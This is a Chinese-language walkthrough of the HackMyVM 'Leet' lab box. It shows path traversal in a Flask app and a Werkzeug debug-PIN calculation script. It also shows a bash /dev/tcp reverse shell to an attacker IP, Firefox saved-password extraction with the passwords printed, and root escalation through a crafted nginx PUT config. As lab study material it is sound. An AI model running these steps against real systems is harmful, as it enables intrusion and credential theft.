Leet

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/Leet]
└─$ rustscan -a 192.168.0.197 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.197:22
Open 192.168.0.197:7777
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e1:5d:7c:b7:07:92:17:dc:46:76:7d:be:a9:50:43:d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO40ZPJ7m6D4U6cVDKC0tpGfvjWc4qisOha/4Lw8EEp8kxB8aDZMMiVoZwc8s+H60NNwTUBsp9iZc/8ZgrPlgn8=
|   256 a0:f3:b3:86:93:f5:58:82:88:dd:e5:10:db:35:de:62 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJt60Bt5N10kc53Nwgf1AM9fZ+78Y0MS7Yq8tYoL7r8i
7777/tcp open  http    syn-ack Werkzeug httpd 3.0.1 (Python 3.11.2)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS POST
|_http-server-header: Werkzeug/3.0.1 Python/3.11.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

┌──(kali💀kali)-[~/temp/Leet]
└─$ gobuster dir -u http://192.168.0.197:7777/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.197:7777/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,txt,html,php,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/download             (Status: 500) [Size: 14478]
Progress: 19456 / 1323366 (1.47%)[ERROR] Get "http://192.168.0.197:7777/1756": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.0.197:7777/1756.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.0.197:7777/1756.zip": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://192.168.0.197:7777/1756.bak": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

看来扫不了

漏洞扫描

┌──(kali💀kali)-[~/temp/Leet]
└─$ nikto -h http://192.168.0.197:7777
- Nikto v2.5.0
---------------------------------------------------------------------------
---------------------------------------------------------------------------
+ 0 host(s) tested

漏洞发现

服务探测

尝试搜寻openssh漏洞，但是没有收获，尝试探测7777端口：

没啥东西，看一下源码，也没发现啥，尝试进行测试这个输入框，输入whoami：

尝试进行搜索，找到一个网站：

询问一下gpt：

你提到的 "L33T converter" 通常指的是一个将文本转换为所谓的 "leet speak" 或 "1337 speak" 的工具。这种语言转换是一种将字母替换为看起来类似的数字或符号的俚语形式，常见于网络文化，特别是早期的黑客和极客社区。

在你给出的例子中：

• 输入：whoami
• 输出：wh04m1

这里的转换规则大致如下：

• o 被替换为 0（因为两者在视觉上相似）
• a 被替换为 4（因为 a 在某些字体中类似于倒过来的 4）
• i 被替换为 1（因为两者在视觉上相似）

这种转换的主要目的是在聊天或论坛中隐藏消息的真实含义，使其对不熟悉这种语言的人来说不那么明显。然而，这也可能被用于恶意目的，例如混淆或隐藏恶意命令或信息。

文件包含

尝试看一下那个敏感目录：

flask 框架可能开启了调试模式，看到console确实是存在的：

但是被锁住了，尝试看一下其他目录，发现下载地址为：http://192.168.0.197:7777/download?filename=converted_text.txt

看一下是否可以进行文件包含：

http://192.168.0.197:7777/download?filename=../../../../../../../../etc/passwd

发现可以正常读取文件：

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
riva:x:1000:1000:,,,:/home/riva:/bin/bash

计算pin

尝试计算pin，可以参考https://github.com/wdahlenburg/werkzeug-debug-console-bypass：

# get_pin.py
import hashlib
from itertools import chain

probably_public_bits = [
    'riva',
    'flask.app',
    'Flask',
    '/opt/project/venv/lib/python3.11/site-packages/flask/app.py'
]

private_bits = [
    '8796756626246',
    'd4e6cb65d59544f3331ea0425dc555a1'
]

h = hashlib.sha1() # or hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

进行改写：

┌──(kali💀kali)-[~/temp/Leet]
└─$ python                                                                                            
Python 3.11.8 (main, Feb  7 2024, 21:52:08) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x0800278dcb46
8796756626246

然后读取三个文件：

/etc/machine-id
# f6791f240ce6407ea271e86b78ac3bdb
/proc/sys/kernel/random/boot_id
# 
/proc/self/cgroup
# 

但是有的读不到，后来ta0神告诉我windows读不出来，但是kali可以。。。。。

尝试进行读取，因为前面看了一下hosts文件发现存在域名解析，尝试进行配置：

127.0.0.1   localhost
127.0.1.1   leet.hmv

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

尝试进行curl：

┌──(kali💀kali)-[~/temp/Leet]
└─$ cat /etc/hosts 
127.0.0.1       localhost
127.0.1.1       kali
10.160.107.159  adria.hmv

::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

192.168.0.165   leet.hmv

┌──(kali💀kali)-[~/temp/Leet]
└─$ curl http://leet.hmv:7777/download?filename=../../../../../../../../etc/passwd
^C

┌──(kali💀kali)-[~/temp/Leet]
└─$ wget http://leet.hmv:7777/download?filename=../../../../../../../../etc/passwd
--2024-07-01 05:37:27--  http://leet.hmv:7777/download?filename=../../../../../../../../etc/passwd
Resolving leet.hmv (leet.hmv)... 192.168.0.165
Connecting to leet.hmv (leet.hmv)|192.168.0.165|:7777... connected.
HTTP request sent, awaiting response... ^C

尝试使用kali的浏览器进行读取：

也是空的。。。。。尝试多读几次，突然又好了（中间那个boot_id读了7次，虽然没啥用）：

/etc/machine-id
# f6791f240ce6407ea271e86b78ac3bdb
/proc/sys/kernel/random/boot_id
# da68b9a7-336e-40df-879a-f38a6447bfe9
/proc/self/cgroup
# 0::/system.slice/flaskapp.service

尝试进行获取机械码：

# tools.py
machine_id = b""
for filename in "machine-id", "boot_id":
    try:
        with open(filename, "rb") as f:
            value = f.readline().strip()
    except OSError:
        continue

    if value:
        machine_id += value
        break
try:
    with open("cgroup", "rb") as f:
        machine_id += f.readline().strip().rpartition(b"/")[2]
except OSError:
    pass

print(machine_id)

┌──(kali💀kali)-[~/temp/Leet]
└─$ vim tools.py  

┌──(kali💀kali)-[~/temp/Leet]
└─$ echo "f6791f240ce6407ea271e86b78ac3bdb" > machine-id

┌──(kali💀kali)-[~/temp/Leet]
└─$ echo "da68b9a7-336e-40df-879a-f38a6447bfe9" > boot_id

┌──(kali💀kali)-[~/temp/Leet]
└─$ echo "0::/system.slice/flaskapp.service" > cgroup    

┌──(kali💀kali)-[~/temp/Leet]
└─$ chmod +x tools.py                 

┌──(kali💀kali)-[~/temp/Leet]
└─$ python3 tools.py 
b'f6791f240ce6407ea271e86b78ac3bdbflaskapp.service'

# exp.py
import hashlib
from itertools import chain

probably_public_bits = [
    'riva',
    'flask.app',
    'Flask',
    '/opt/project/venv/lib/python3.11/site-packages/flask/app.py'
]

private_bits = [
    '8796760530867',
    'f6791f240ce6407ea271e86b78ac3bdbflaskapp.service'
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

试了很久一直不行，灵机一动riva换成了www-data，成功了。。。。。

尝试提取shell：

__import__('os').popen('whoami').read();
__import__('os').system('bash -c "bash -i >& /dev/tcp/192.168.0.143/1234 0>&1"')

提权

micro提权

(remote) www-data@leet.hmv:/opt/project$ cd ~
(remote) www-data@leet.hmv:/var/www$ ls -la
total 12
drwxr-xr-x  3 root root 4096 Feb 14 21:00 .
drwxr-xr-x 12 root root 4096 Feb 12 11:27 ..
drwxr-xr-x  2 root root 4096 Feb 14 21:00 html
(remote) www-data@leet.hmv:/var/www$ cd html
(remote) www-data@leet.hmv:/var/www/html$ sudo -l
Matching Defaults entries for www-data on leet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on leet:
    (riva) NOPASSWD: /usr/bin/micro
(remote) www-data@leet.hmv:/var/www/html$ file /usr/bin/micro
/usr/bin/micro: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=ZGN4-PEgidp0GQFC2DhN/npFl-ZmzE1stSjkF3ozz/9KOuVtA_3CSCIt1HL-lM/Huh9eaBrgytFpqcC9L-9, stripped
(remote) www-data@leet.hmv:/var/www/html$ sudo -u rive /usr/bin/micro
sudo: unknown user rive
sudo: error initializing audit plugin sudoers_audit

发现是一款编辑器：

(remote) www-data@leet.hmv:/var/www/html$ /usr/bin/micro -h
Usage: micro [OPTIONS] [FILE]...
-clean
        Cleans the configuration directory
-config-dir dir
        Specify a custom location for the configuration directory
[FILE]:LINE:COL (if the `parsecursor` option is enabled)
+LINE:COL
        Specify a line and column to start the cursor at when opening a buffer
-options
        Show all option help
-debug
        Enable debug mode (enables logging to ./log.txt)
-version
        Show the version number and information

Micro's plugin's can be managed at the command line with the following commands.
-plugin install [PLUGIN]...
        Install plugin(s)
-plugin remove [PLUGIN]...
        Remove plugin(s)
-plugin update [PLUGIN]...
        Update plugin(s) (if no argument is given, updates all plugins)
-plugin search [PLUGIN]...
        Search for a plugin
-plugin list
        List installed plugins
-plugin available
        List available plugins

Micro's options can also be set via command line arguments for quick
adjustments. For real configuration, please use the settings.json
file (see 'help options').

-option value
        Set `option` to `value` for this session
        For example: `micro -syntax off file.c`

Use `micro -options` to see the full list of configuration options

去官网翻文档，发现：

尝试进行利用：

(remote) www-data@leet.hmv:/var/www/html$ sudo -u riva /usr/bin/micro
ctrl+b 
$ /bin/bash
riva@leet:/var/www/html$ 

这里的ctrl+b对应的图片有问题，我当初是先试出来ctrl+b的，后来找文档估计找错了，谢谢小舟师傅的指正，这里的文档实际上是通过先进入micro再执行ctrl+e最后help keybindings可以找到的，实际上ctrl+b是一种shell模式，而ctrl+e是一种命令格式，在普通文档中就可以查到了：

firefox密码提取

(remote) www-data@leet.hmv:/var/www/html$ sudo -u riva /usr/bin/micro
riva@leet:/var/www/html$ cd ~
riva@leet:~$ ls -la
total 40
drwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .
drwxr-xr-x 3 root root 4096 Feb 14 21:00 ..
lrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -> /dev/null
-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout
-rw-r--r-- 1 riva riva 3526 Feb 14 21:00 .bashrc
drwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config
drwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local
drwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla
-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile
drwx------ 2 riva riva 4096 Feb 14 21:00 .ssh
-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt
riva@leet:~$ cat user.txt 
3a5cf7b35876169c280229c213ed63c1
riva@leet:~$ sudo -l
[sudo] password for riva: 
Sorry, try again.
[sudo] password for riva: 
sudo: 1 incorrect password attempt
riva@leet:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
riva:x:1000:1000:,,,:/home/riva:/bin/bash
riva@leet:~$ ls -la /etc/shadow
-rw-r----- 1 root shadow 779 Feb 11 15:57 /etc/shadow
riva@leet:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
riva@leet:~$ ls -la
total 40
drwxr-xr-x 6 riva riva 4096 Feb 14 21:00 .
drwxr-xr-x 3 root root 4096 Feb 14 21:00 ..
lrwxrwxrwx 1 riva riva    9 Feb 11 15:58 .bash_history -> /dev/null
-rw-r--r-- 1 riva riva  220 Feb 14 21:00 .bash_logout
-rw-r--r-- 1 riva riva 3526 Feb 14 21:00 .bashrc
drwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .config
drwxr-xr-x 3 riva riva 4096 Feb 14 21:00 .local
drwx------ 4 riva riva 4096 Feb 14 21:00 .mozilla
-rw-r--r-- 1 riva riva  807 Feb 14 21:00 .profile
drwx------ 2 riva riva 4096 Feb 14 21:00 .ssh
-rwx------ 1 riva riva   33 Feb 14 21:00 user.txt
riva@leet:~$ cd .mozilla/
riva@leet:~/.mozilla$ ls -la
total 16
drwx------ 4 riva riva 4096 Feb 14 21:00 .
drwxr-xr-x 6 riva riva 4096 Feb 14 21:00 ..
drwx------ 2 riva riva 4096 Feb 14 21:00 extensions
drwx------ 6 riva riva 4096 Feb 14 21:00 firefox
riva@leet:~/.mozilla$ cd firefox/
riva@leet:~/.mozilla/firefox$ ls -la
total 32
drwx------  6 riva riva 4096 Feb 14 21:00  .
drwx------  4 riva riva 4096 Feb 14 21:00  ..
drwx------  3 riva riva 4096 Feb 14 21:00 'Crash Reports'
drwx------ 16 riva riva 4096 Feb 14 21:00  guu30cui.default-esr
-rw-r--r--  1 riva riva   58 Feb 14 21:00  installs.ini
drwx------  2 riva riva 4096 Feb 14 21:00 'Pending Pings'
-rw-r--r--  1 riva riva  247 Feb 14 21:00  profiles.ini
drwx------  2 riva riva 4096 Feb 14 21:00  zbznfk37.default
riva@leet:~/.mozilla/firefox$ pwd
/home/riva/.mozilla/firefox
riva@leet:~/.mozilla/firefox$ cd /tmp
riva@leet:/tmp$ vim firefox_decrypt.py
bash: vim: command not found
riva@leet:/tmp$ vi firefox_decrypt.py
riva@leet:/tmp$ chmod +x firefox_decrypt.py 
riva@leet:/tmp$ python -V
bash: python: command not found
riva@leet:/tmp$ python3 -V
Python 3.11.2
riva@leet:/tmp$ python3 firefox_decrypt.py 
Select the Mozilla profile you wish to decrypt
1 -> zbznfk37.default
2 -> guu30cui.default-esr
1
2024-07-01 12:35:59,994 - ERROR - Couldn't initialize NSS, maybe '/home/riva/.mozilla/firefox/zbznfk37.default' is not a valid profile?
riva@leet:/tmp$ python3 firefox_decrypt.py 
Select the Mozilla profile you wish to decrypt
1 -> zbznfk37.default
2 -> guu30cui.default-esr
2

Website:   chrome://FirefoxAccounts
Username: '1db9561103ca4adc9afa6357c0a0b554'
Password: '{"version":1,"accountData":{"scopedKeys":{"https://identity.mozilla.com/apps/oldsync":{"kid":"1603273389635-IxsZ6HpGK9fL9tUfdcBqwA","k":"Q8lFF-E91kvogabSQ2yjKj7k2JHX30UDeHEriaxaCY5slUVmtQvP-e3is5GxBiUKkG3g4dQLbFRsVOYeMkjNpg","kty":"oct"},"sync:addon_storage":{"kid":"1603273389635-Ng9dJrdpVFqEoBs-R3LaTMKTiSWhWypqfmg9MJDby4U","k":"L8MGJk3tWVlmN9Sm-MmdauxuQ38fIl--NziTjg_AmjO51_-vHo70OELMwif8kqn2zE3Yqg30BLw1ndNplRzGCA","kty":"oct"}},"kSync":"43c94517e13dd64be881a6d2436ca32a3ee4d891d7df450378712b89ac5a098e6c954566b50bcff9ede2b391b106250a906de0e1d40b6c546c54e61e3248cda6","kXCS":"231b19e87a462bd7cbf6d51f75c06ac0","kExtSync":"2fc306264ded59596637d4a6f8c99d6aec6e437f1f225fbe3738938e0fc09a33b9d7ffaf1e8ef43842ccc227fc92a9f6cc4dd8aa0df404bc359dd369951cc608","kExtKbHash":"360f5d26b769545a84a01b3e4772da4cc2938925a15b2a6a7e683d3090dbcb85"}}'

Website:   http://leet.hmv
Username: 'riva'
Password: 'PGH$2r0co3L5QL'

Website:   https://hackmyvm.eu
Username: 'riva'
Password: 'lovelove80'

中间使用的工具是：https://github.com/unode/firefox_decrypt

nginx提权

得到密码以后，发现root权限的nginx，参考https://gist.github.com/DylanGrl/ab497e2f01c7d672a80ab9561a903406进行提权：

riva@leet:/tmp$ cd ~
riva@leet:~$ sudo -l
[sudo] password for riva: 
Sorry, try again.
[sudo] password for riva: 
Matching Defaults entries for riva on leet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User riva may run the following commands on leet:
    (root) /usr/sbin/nginx

尝试利用下属脚本修改配置文件，再put上传提权：

riva@leet:~$ cd /tmp
riva@leet:/tmp$ cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1339;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
EOF
riva@leet:/tmp$ cat /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1339;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
riva@leet:/tmp$ sudo -l
Matching Defaults entries for riva on leet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User riva may run the following commands on leet:
    (root) /usr/sbin/nginx
riva@leet:/tmp$ sudo -u root nginx -c /tmp/nginx_pwn.conf
2024/07/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2024/07/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2024/07/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2024/07/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2024/07/01 12:45:40 [emerg] 809#809: bind() to 0.0.0.0:1339 failed (98: Address already in use)
2024/07/01 12:45:40 [emerg] 809#809: still could not bind()
riva@leet:/tmp$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/riva/.ssh/id_rsa): root_shell
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in root_shell
Your public key has been saved in root_shell.pub
The key fingerprint is:
SHA256:Vdg6wvnm+W39eeMRnIhdAO1PGITfYzf+8b2/PzBZBIw riva@leet.hmv
The key's randomart image is:
+---[RSA 3072]----+
|           +O+.  |
|          .E.+.. |
|       . ...o =. |
|        +.o o++Bo|
|        So o oB++|
|          o  + +.|
|         o .  oo=|
|          o  ..oO|
|           ...o=&|
+----[SHA256]-----+
riva@leet:/tmp$ cat root_shell.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYGNPkdarKmzApSzqwR/nakMAIMaR1La6ExDP95nswIpGxctSrqUgUtuGQZMXgcGPmVA5IcABBz+x5xjPO9UJJFRVoF9MK0Jh+imD2J30iBXDllZrnj9ws35BcBbtggRcK9sIr+zHxIuAJVGHwieBoOd1XB1tYycB84rMrS1pFNXhPRGViHtJaFh7tRREoRnfZdlRpRA9SCk395Ji0jEZcAr5ffBk43devMGdo2eR8VyJcriCp+hKlRRb6nep0tJsX2T+o/oK7WeiFU5j8jObqmrFbg99KfQ3KEFvGaGogKbW6pkFn8HCMr82NrPYrPaWqeskN8RxoaefXsNd6509cTCJWwpfysT4/hNVU5W/DnUh5IDPSpQH/Pwc8c+DJYGJZZHt2dj+guyqGaSFpPoSyE1mrbQ2zUoXQmvG4elDj58Ck8XsYuoksmoCRUeWMZnUFktLKtKQEPPZ9SCwEwpc+hw9RnOPYBuho49l5mVq0Qk9Hz7xim3O9hcOeSplGPsE= riva@leet.hmv
riva@leet:/tmp$ curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCYGNPkdarKmzApSzqwR/nakMAIMaR1La6ExDP95nswIpGxctSrqUgUtuGQZMXgcGPmVA5IcABBz+x5xjPO9UJJFRVoF9MK0Jh+imD2J30iBXDllZrnj9ws35BcBbtggRcK9sIr+zHxIuAJVGHwieBoOd1XB1tYycB84rMrS1pFNXhPRGViHtJaFh7tRREoRnfZdlRpRA9SCk395Ji0jEZcAr5ffBk43devMGdo2eR8VyJcriCp+hKlRRb6nep0tJsX2T+o/oK7WeiFU5j8jObqmrFbg99KfQ3KEFvGaGogKbW6pkFn8HCMr82NrPYrPaWqeskN8RxoaefXsNd6509cTCJWwpfysT4/hNVU5W/DnUh5IDPSpQH/Pwc8c+DJYGJZZHt2dj+guyqGaSFpPoSyE1mrbQ2zUoXQmvG4elDj58Ck8XsYuoksmoCRUeWMZnUFktLKtKQEPPZ9SCwEwpc+hw9RnOPYBuho49l5mVq0Qk9Hz7xim3O9hcOeSplGPsE= riva@leet.hmv"
riva@leet:/tmp$ ssh root@0.0.0.0 -i root_shell 
Linux leet.hmv 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 28 17:37:49 2024 from 192.168.0.178
root@leet:~# cat root
cat: root: No such file or directory
root@leet:~# ls
index.html  r007_fl46.7x7  troll.jpg
root@leet:~# cat r007_fl46.7x7
ca169772acb099a02ebab8da1d9070ea

接着找到了一个彩蛋：

root@leet:~# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.0.143 - - [01/Jul/2024 12:49:27] "GET /troll.jpg HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

┌──(kali💀kali)-[~/temp/Leet]
└─$ wget http://192.168.0.165:8888/troll.jpg            
--2024-07-01 06:48:59--  http://192.168.0.165:8888/troll.jpg
Connecting to 192.168.0.165:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47428 (46K) [image/jpeg]
Saving to: ‘troll.jpg’

troll.jpg                            100%[=====================================================================>]  46.32K  --.-KB/s    in 0.02s   

2024-07-01 06:48:59 (1.95 MB/s) - ‘troll.jpg’ saved [47428/47428]

额外探索

我对前面的那些下载不下来的文件还是有些耿耿于怀，尝试探索一下：

root@leet:~# cd /tmp
root@leet:/tmp# wget http://192.168.0.143:8888/linpeas.sh
--2024-07-01 12:59:06--  http://192.168.0.143:8888/linpeas.sh
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860549 (840K) [text/x-sh]
Saving to: ‘linpeas.sh.1’

linpeas.sh.1                         100%[=====================================================================>] 840.38K  --.-KB/s    in 0.03s   

2024-07-01 12:59:07 (29.1 MB/s) - ‘linpeas.sh.1’ saved [860549/860549]

root@leet:/tmp# wget http://192.168.0.143:8888/pspy64
--2024-07-01 12:59:13--  http://192.168.0.143:8888/pspy64
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4468984 (4.3M) [application/octet-stream]
Saving to: ‘pspy64.1’

pspy64.1                             100%[=====================================================================>]   4.26M  --.-KB/s    in 0.1s    

2024-07-01 12:59:13 (31.2 MB/s) - ‘pspy64.1’ saved [4468984/4468984]

root@leet:/tmp# chmod +x *
root@leet:/tmp# ./linpeas.sh

linpeas.sh 我随便看了一下没啥奇怪的东西，定时任务不清楚，pspy64运行异常，然后找群主借了一个：

root@leet:/tmp# wget http://192.168.0.143:8888/lpspy64
--2024-07-01 13:07:30--  http://192.168.0.143:8888/lpspy64
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘lpspy64’

lpspy64                              100%[=====================================================================>]   2.96M  --.-KB/s    in 0.05s   

2024-07-01 13:07:30 (63.8 MB/s) - ‘lpspy64’ saved [3104768/3104768]

root@leet:/tmp# chmod +x *
root@leet:/tmp# ./lpspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d

     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     
2024/07/01 13:07:42 CMD: UID=0     PID=3      | 
2024/07/01 13:07:42 CMD: UID=0     PID=2      | 
